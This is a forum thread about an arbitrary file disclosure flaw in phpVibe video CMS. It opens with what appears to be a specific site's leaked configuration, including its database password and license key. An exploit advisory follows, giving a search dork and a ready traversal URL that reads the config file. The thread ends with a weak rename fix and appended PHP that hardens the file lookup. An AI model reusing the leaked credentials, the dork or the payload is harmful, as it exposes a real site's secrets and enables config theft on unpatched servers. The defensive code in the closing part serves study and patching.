
[ Video Sharing CMS v4 ] PHPVIBE ERROR DATABASE

Started by MacKen,


MacKen (topic starter)

http://www.videoinedit.com/

All versions


/** MySQL database username */
define( 'DB_USER', 'videoine_32' );

/** MySQL database password */
define( 'DB_PASS', '45767721' );

/** The name of the database */
define( 'DB_NAME', 'videoine_23' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** MySQL tables prefix */
define( 'DB_PREFIX', 'vibe_' );

/** MySQL cache timeout */
/** For how many hours should queries be cached? **/
define( 'DB_CACHE', '5' );

/*
 ** Site options
 */
/** License key (can be created in the store, under "My Licenses") **/
define( 'phpVibeKey', 'V300-3490-OU8Q-4JP7-RGO0' );

PHPVibe A.

Why am I seeing a copy of our config?
Can you please explain? I have no clue where you got this.

MacKen (topic starter)

## In The Name Of ALLAH ##
# Exploit Title: phpVibe ALL versions (version 4.0 and older versions) Arbitrary File Disclosure
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions (leading to version 4.0)
# Tested on: Linux
# Greetings: VIRkid, b0x, phantom_x, Ch3rn0by1


stream.php
====================================
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

The file parameter has no validation or sanitization!
Exploitation can be performed by adding "@@media" to the file name and base64-encoding it twice, as below (no registration needed):

http://domain/stream.php?file=../vibe_config.php@@media ==> http://domain/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09

MacKen (topic starter)

FIX (for the website owner):

Open file load.php (FOLDER ROOT)

Rename: /vibe_config.php >>> *.php (e.g. conect.php)


FOLDER ROOT :

Rename: vibe_config.php >>> *.php (e.g. conect.php)

OK, finished.


FILE NOT SHOWN

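The stream.php line quoted in the advisory above and the rename suggested in the fix post concern the same defect: the decoded file parameter reaches the filesystem without any check that it stays inside the media directory, so renaming vibe_config.php hides one file but leaves the traversal itself in place. The PHP below is an added example written for this thread, not phpVibe's own code; it places the quoted vulnerable lookup beside a hardened one. It assumes media files live under a directory named MEDIA_ROOT and that the token still carries the "@@media" suffix the advisory mentions; both names, and the function names, are assumptions.

```php
<?php
// Added example for this thread (not phpVibe's code). It contrasts the
// unvalidated stream.php line quoted in the advisory with a hardened
// lookup that confines every resolved path to the media directory.
// Assumption: media files live under MEDIA_ROOT and the client-supplied
// value is the double-base64 token described in the advisory.

const MEDIA_ROOT = __DIR__ . '/media';   // assumed upload directory

// Vulnerable form (the line quoted in the advisory): the decoded token is
// later used as a file path with no validation, so "../" segments in it
// escape the media directory. htmlspecialchars() does nothing for paths.
function vulnerable_resolve(string $fileParam): string
{
    return htmlspecialchars(base64_decode(base64_decode($fileParam)));
}

// Hardened form: decode strictly, drop the "@@media" marker, accept only a
// plain file name, and verify the canonical path stays inside MEDIA_ROOT.
// Returns null instead of a path on any failure.
function safe_resolve(string $fileParam): ?string
{
    $inner = base64_decode($fileParam, true);      // strict: reject junk input
    if ($inner === false) {
        return null;
    }
    $name = base64_decode($inner, true);
    if ($name === false) {
        return null;
    }
    // The advisory indicates the token ends in "@@media"; strip that marker
    // before touching the filesystem so it cannot confuse the checks below.
    $name = preg_replace('/@@media\z/', '', $name);

    // Allow only a bare file name: no directory separators, no NUL bytes,
    // no newline, and no leading dot (which rules out "..").
    if (!preg_match('/\A[A-Za-z0-9._-]+\z/', $name) || $name[0] === '.') {
        return null;
    }

    $root = realpath(MEDIA_ROOT);
    $path = realpath(MEDIA_ROOT . DIRECTORY_SEPARATOR . $name);
    // realpath() returns false for a missing file; the prefix comparison also
    // defends against a symlink inside the media directory pointing outside.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Demonstration on a token built the way the advisory describes (constructed
// here, not captured) and on a legitimate media file name.
$traversal = base64_encode(base64_encode('../vibe_config.php@@media'));
$legit     = base64_encode(base64_encode('clip.mp4@@media'));

var_dump(vulnerable_resolve($traversal)); // "../vibe_config.php@@media": escapes the media dir
var_dump(safe_resolve($traversal));       // NULL: rejected before any file access
var_dump(safe_resolve($legit));           // canonical path under media/ if clip.mp4 exists, else NULL
```

The hardened function returns null rather than a path whenever the token fails strict base64 decoding, contains anything but a plain file name, or canonicalises (via realpath) to a location outside the media directory; the caller should answer such requests with a 404 and log the raw parameter, since a rejected token is also a useful detection signal for a site that has already been probed this way.
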